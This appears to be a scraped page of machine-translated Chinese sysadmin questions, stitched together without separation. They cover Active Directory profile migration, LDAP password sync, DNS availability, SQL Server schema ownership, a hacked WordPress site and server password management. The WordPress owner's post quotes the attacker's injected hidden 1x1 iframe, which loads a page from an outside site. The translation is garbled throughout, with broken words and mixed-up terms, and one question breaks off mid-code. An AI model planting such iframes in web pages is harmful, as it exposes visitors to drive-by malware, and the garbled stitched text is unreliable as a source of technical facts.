我的公司正在评估一个从Windows迁移到Linux的计划。 你可以在Linux中build议一些类似于漫游用户configuration文件和Active Directory环境中的域用户的东西吗?
我有一个很老的工作组中的几个用户直接login到他们的本地计算机(Windows XP专业版)。 本周他们终于转移到活动目录,而需要login到域帐户。 然而,其中一些用户已经很长时间了,并且在本地机器上的configuration文件中有所投资。 如何将这些configuration文件移动到新的Active Directory帐户,以便像桌面背景,浏览器书签和其他潜在的“隐藏”设置的东西会跟着他们? 在一种情况下,我们甚至有一个Windows媒体播放器播放列表,我们想要无缝移动,尽pipe如果需要可以很容易地重新创build。
在工作中,我们正处于身份pipe理项目的早期阶段。 这都是在上级的情况下,我们有几千名教职员工和大约两万名学生。 有没有人使用Sun的LDAP服务器与AD域(Kerberos领域)密码存储? 有没有人在之前运行一个二十五万的AD域? 我们对身份pipe理的一个select是将活跃的员工推送到AD,并将密码/身份信息的另一个副本推送到LDAP。 如果我们这样做了,我们需要有一个中心位置来更改密码,这样,如果您更改您的AD(或ldap)密码,则更改会同步到另一个(或允许分歧) 另一种select是让AD成为密码的唯一权威机构,然后我们必须为所有的关联公司(以及所有的老关联公司)在十年或二十年内拥有一个负责人,所以我们可能在AD有二十五万个实体,其中只有20-30k将被访问任何频率。 AD会在负荷下爆炸吗? 是否有其他方法来保持Sun的LDAP和AD之间的密码同步? 别人的经验是什么?
据我所知,当我打开一个像Google这样的网站时,查找主机名,我的浏览器使用得到的IP地址连接到服务器并检索页面。 但是,高可用性网站如何确保始终能够访问这个单一的IP地址? 是不是一个单一的失败点?
我打算分配一个SQL Serverlogin到 db_datareader db_datawriter 数据库angular色 。 但是,如果肚子疼和疲倦的一刻,我不小心给这个用户架构所有权,而不是: 现在忽略它在概念上意味着用户“拥有”这两个内置模式。 并忽略了现在是否甚至是一个用户拥有这两个模式的问题(例如,如果我想删除用户将内置模式去与它)。 我的问题是:我如何撤消它? 我随机打在我的键盘上的键,它出来了 : 修改模式中的ALTER AUTHORIZATION :: [db_datareader] TO [db_datareader] F5 但那没有做任何事情; 所以现在是时候咨询专家了。 Microsoft SQL Server 2005 – 9.00.5057.00(Intel X86)Mar 25 2011 13:50:04 Copyright(c)1988-2005 Microsoft Corporation Standard Edition
最终更新: 在过去的几个星期里,事情已经和平了,并且教会了我更多关于网站安全和风险的信息。 这是我的故事版本 – 我正在使用一个老版本的WordPress,可能这个人从谷歌抓到我。 我认为这是一个脚本攻击。 很难说什么时候,什么时候安全实际上是妥协的,这是我在2009年11月5日发现的。当时我采取了一些安全措施(如下所述),但总是有可能错过了在改变wordpress密码的时候我格式化了我的工作电脑。 现在我已经从主机中删除了所有不需要的PHP脚本,只让我的IP访问pipe理部分,阻止了一个属于越南的特定IP范围。 每日备份和其他的东西。 事情就是有太多的variables涉及到,而且很难跟踪每一件事情。 主要的教训是为它做好准备。 🙂 我正在通过GoDaddy共享托pipe计划并运行一个WordPress网站。 我的网站是在2009年11月5日第一次被黑客攻击的。当时黑客用自己的广告replace了我的广告。 我以为这是因为我对安全的懒惰而发生的,但是我错了。 我格式化了我的电脑,并再次设置一切。 用Microsoft Security Essentials取代了ESET NOD32。 升级到最新版本的WordPress。 更改了所有密码。 build立一个新的数据库。 和其他安全相关的东西我读到这里和那里。 事情有一段时间运行良好,直到我的网站今天再次被黑客攻击。 上次,这个人玩了很多文件,特别是改变了footer.php和所有与广告有关的文件。 但是这次他只是去了正确的地方,换成下面的代码 – <IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME> <form action="http://www.google.com/cse" id="cse-search-box"> <div> <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" […]
鉴于为不同的系统设置不同的密码是多么重要,一个拥有数千台服务器的数据中心如何pipe理? 目前我只能pipe理几十台机器,但数量往往会增长,特别是虚拟机。 如果您克隆一个虚拟机,它将拥有相同的密码,如果这是自动化工作stream的一部分,则没有太多机会改变它。 如果您自动更改密码,需要安全地完成,并且您又回到了单点故障。 那么,人们做什么呢? 我应该解释一下,问题是没有考虑密码(有很多密码生成器),但是有一个高效的设置和logging过程,尤其是当机器是自动创build的。
我们是否必须符合PCI规范才能在我们的托pipe数据库中存储社会安全号码? 我们在南卡罗来纳州为非营利组织提供CRM数据库。
我正在一个项目中,我们要在我们拥有的Linux服务器上托pipe一个Ruby on Rails应用程序。 Linux的所有风格同样能够托pipeRails应用程序吗? 如果没有,那么在一些Linux发行版中有什么function,但是对于托pipeRails应用程序而言是不可或缺的function呢?
我有一个网站,一些客户正在使用托pipe他们的网站。 他们都有自己的域名,但使用相同的托pipe服务。 让它们在同一个IIS网站上运行该网站上的所有主机标头是否更好?还是应该为每个指向服务器上同一物理目录的域创build不同的网站和应用程序池?